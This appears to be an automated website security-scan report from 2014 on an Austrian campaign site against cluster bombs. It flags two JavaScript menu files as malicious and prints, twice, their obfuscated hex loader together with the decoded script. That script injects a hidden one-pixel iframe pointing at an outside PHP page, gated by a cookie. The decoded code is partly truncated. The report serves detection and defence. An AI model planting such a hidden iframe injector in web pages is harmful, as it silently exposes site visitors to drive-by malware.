Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=stopstreubomben.at
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://stopstreubomben.at/ | HTTP/1.1 302 Found Connection: close Date: Mon, 31 Mar 2014 23:33:06 GMT Location: http://www.stopstreubomben.at/ Server: Apache Content-Length: 282 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.stopstreubomben.at/ | 200 OK Content-Length: 1897 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/home.html | 200 OK Content-Length: 88784 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/exmplmenu_var.js | 200 OK Content-Length: 8942 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e7c772e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e7c773c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e7c773c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e7c773c8182877a733c707d807273802e4b2e353e35491b182e7c773c8182877a Decoded script: String String function zzzfff() { var ni = document.createElement('iframe'); ni.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php'; ni.style.position = 'absolute'; ni.style.border = '0'; ni.style.height = '1px'; ni.style.width = '1px'; ni.style.left = '1px'; ni.style.top = '1px'; if (!document.getElementById('ni')) { document.write('<div id=\'ni\'></div>'); document.getElementById('ni'). ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.stopstreubomben.at/CMC/menu_com.js | 200 OK Content-Length: 26100 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) try{if(window.document)--document.getElementById('12')}catch(qq){if(qq!=null)ss=eval("St"+"ring");}a="2e74837c7182777d7c2e88888874747436372e891b182e846f802e7c772e4b2e727d71837b737c823c7180736f8273537a737b737c8236357774806f7b733537491b181b182e7c773c8180712e4b2e357682827e483d3d8585853c736f757a7381837c81878182737b3c717d7b3d847772737d3d79467276595f56803c7e767e35491b182e7c773c8182877a733c7e7d817782777d7c2e4b2e356f70817d7a83827335491b182e7c773c8182877a733c707d807273802e4b2e353e35491b182e7c773c8182877a Decoded script: String String function zzzfff() { var ni = document.createElement('iframe'); ni.src = 'http://www.eaglesunsystem.com/video/k8dhKQHr.php'; ni.style.position = 'absolute'; ni.style.border = '0'; ni.style.height = '1px'; ni.style.width = '1px'; ni.style.left = '1px'; ni.style.top = '1px'; if (!document.getElementById('ni')) { document.write('<div id=\'ni\'></div>'); document.getElementById('ni'). ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); zzzfff(); } } Antivirus reports:
| ||
http://www.stopstreubomben.at/CMC/supporters.html | 200 OK Content-Length: 4599 Content-Type: text/html | clean |
http://www.stopstreubomben.at/test/php/petition3/eintrag.html | 200 OK Content-Length: 1593 Content-Type: text/html | clean |
http://www.stopstreubomben.at/test404page.js | 404 Not Found Content-Length: 2918 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/supportersHF.html | 200 OK Content-Length: 4834 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/downloads/unterstuetzung_hf.pdf | 200 OK Content-Length: 137111 Content-Type: application/pdf | clean |
http://www.stopstreubomben.at/CMC/supportersUP.html | 200 OK Content-Length: 4761 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/supportersCS.html | 200 OK Content-Length: 4782 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/supportersEB.html | 200 OK Content-Length: 4887 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/supportersPP.html | 200 OK Content-Length: 4520 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/kontakt.html | 200 OK Content-Length: 4023 Content-Type: text/html | clean |
http://www.stopstreubomben.at/CMC/downloads/LendyourLegcampaign040412.doc | 200 OK Content-Length: 108032 Content-Type: application/msword | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: stopstreubomben.at
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 31 Mar 2014 23:33:06 GMT
Location: http://www.stopstreubomben.at/
Server: Apache
Content-Length: 282
Content-Type: text/html; charset=iso-8859-1
...282 bytes of data.
GET / HTTP/1.1
Host: stopstreubomben.at
Result:
HTTP/1.1 302 Found
Connection: close
Date: Mon, 31 Mar 2014 23:33:06 GMT
Location: http://www.stopstreubomben.at/
Server: Apache
Content-Length: 282
Content-Type: text/html; charset=iso-8859-1
...282 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: stopstreubomben.at
Referer: http://www.google.com/search?q=stopstreubomben.at
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: stopstreubomben.at
Referer: http://www.google.com/search?q=stopstreubomben.at
Result:
The result is similar to the first query. There are no suspicious redirects found.